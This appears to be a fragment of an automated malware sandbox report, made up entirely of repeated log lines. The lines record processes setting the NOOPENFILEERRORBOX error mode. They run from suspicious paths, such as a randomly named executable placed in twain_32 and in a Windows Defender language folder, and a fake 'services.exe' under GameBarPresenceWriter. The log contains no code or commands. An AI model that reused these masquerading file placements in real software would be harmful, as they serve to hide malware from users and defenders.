                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
